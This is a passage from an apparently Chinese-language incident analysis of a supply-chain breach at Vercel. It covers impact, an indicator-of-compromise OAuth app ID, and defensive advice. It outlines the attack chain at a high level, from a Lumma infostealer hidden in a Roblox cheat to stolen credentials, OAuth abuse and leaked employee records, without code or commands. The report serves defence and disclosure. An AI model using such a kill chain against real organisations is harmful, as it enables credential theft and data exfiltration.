400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第三方信任链的脆弱性</span></strong><span leaf="">：现代软件开发高度依赖第三方服务，每个第三方服务都构成潜在的攻击面。攻击者无需直接攻陷目标，只需突破其供应链中最薄弱的环节。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">OAuth授权的过度发放</span></strong><span leaf="">：开发人员为便捷性往往授予第三方应用超出必要范围的权限。当第三方应用被攻陷时，过度授权的OAuth令牌将成为攻击者的利器。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">影响范围评估</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">影响维度</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">具体情况</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">直接受影响客户</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">有限数量，Vercel已直接通知</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">数据泄露范围</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">非敏感环境变量、内部部署配置、API密钥、员工记录（约580条）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">服务可用性</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Vercel核心服务保持正常运行</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">供应链下游影响</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Next.js、Turbopack等开源项目经确认未受影响</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">失陷指标（IOC）</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对Vercel官方发布的IOC进行了多源验证，确认以下指标可用于安全排查：</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">OAuth应用标识符</span></h3><pre style="overflow-wrap: break-word;word-break: break-all;white-space: pre-wrap;max-width: 100%;color: rgb(43, 48, 59);font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">OAuth App ID: 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com</span></code></pre><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">验证状态</span></strong><span leaf="">：该OAuth应用已被URLhaus标记为恶意，当前处于黑名单状态。建议Google Workspace管理员立即排查是否批准过此应用的授权请求。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">排查建议</span></strong><span leaf="">：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">登录Google Workspace管理控制台</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">进入“安全性” → “API权限” → “已授权的应用”</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">搜索上述App ID，若存在授权记录，立即撤销并检查账户活动日志</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">检查是否有异常的资源访问行为</span></p></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁行为体关联指标</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">指标类型</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">描述</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">关联置信度</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">泄露数据样本</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">BreachForums上约580条员工记录</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">高</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">勒索要价</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">200万美元</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">高</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">数据打包特征</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">数据库、源代码、API密钥、NPM/GitHub token</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">高</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">初始感染载体</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Lumma信息窃取器 + Roblox作弊程序</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">高</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">防御建议</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">针对Vercel客户</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">立即轮换未标记为敏感的API密钥和令牌<span textstyle="" style="font-weight: normal;">：特别是与GitHub、NPM、内部服务相关的凭据</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">启用环境变量敏感标记功能<span textstyle="" style="font-weight: normal;">：将所有包含访问密钥、token和内部配置的变量标记为敏感</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">审计活动日志<span textstyle="" style="font-weight: normal;">：检查近期是否有异常的OAuth应用访问或环境变量读取行为</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">审查第三方应用授权<span textstyle="" style="font-weight: normal;">：清理所有非必要且不熟悉的OAuth应用授权</span></span></strong></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">针对企业开发者</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">个人设备安全加固<span textstyle="" style="font-weight: normal;">：在处理企业资源的个人设备上启用企业级端点防护</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">避免在工作设备上下载非官方软件<span textstyle="" style="font-weight: normal;">：特别是不明来源的游戏辅助、破解工具</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">实施MFA和最小权限原则<span textstyle="" style="font-weight: normal;">：限制单一账户的权限范围，降低凭据泄露的破坏半径</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">定期轮换OAuth令牌<span textstyle="" style="font-weight: normal;">：建立自动化的凭据轮换机制</span></span></strong></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">针对SaaS和云服务提供商</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">默认加密所有环境变量<span textstyle="" style="font-weight: normal;">：改变基于标记的加密策略，实施默认加密</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第三方应用白名单机制<span textstyle="" style="font-weight: normal;">：对OAuth应用实施严格的审核和授权流程</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">供应链安全审计<span textstyle="" style="font-weight: normal;">：定期评估第三方服务的安全态势，将供应链风险纳入整体风险管理框架</span></span></strong></li></ol><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">总结</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">此次Vercel供应链攻击事件是2026年以来最具代表性的供应链攻陷案例之一。从攻击链完整性来看，事件经历了“信息窃取器感染→凭据武器化→OAuth滥用→数据外泄”的完整杀伤链，每个环节都利用了现代开发流程中的典型安全盲区。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">关键警示</span></strong><span leaf="">：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">信息窃取器仍然是企业供应链最有效的突破口。攻击者无需使用高级APT技术，只需利用社交工程和恶意软件即可获取高价值企业凭据。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">OAuth生态系统的信任模型存在根本性缺陷。当第三方应用被攻陷时，其持有的令牌将自动成为攻击者的通行证。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">云平台的默认安全配置不足以应对有针对性的供应链攻击。企业需要建立超越平台默认保护机制的安全能力。</span></p></li></ol><p style="overflow-wrap: 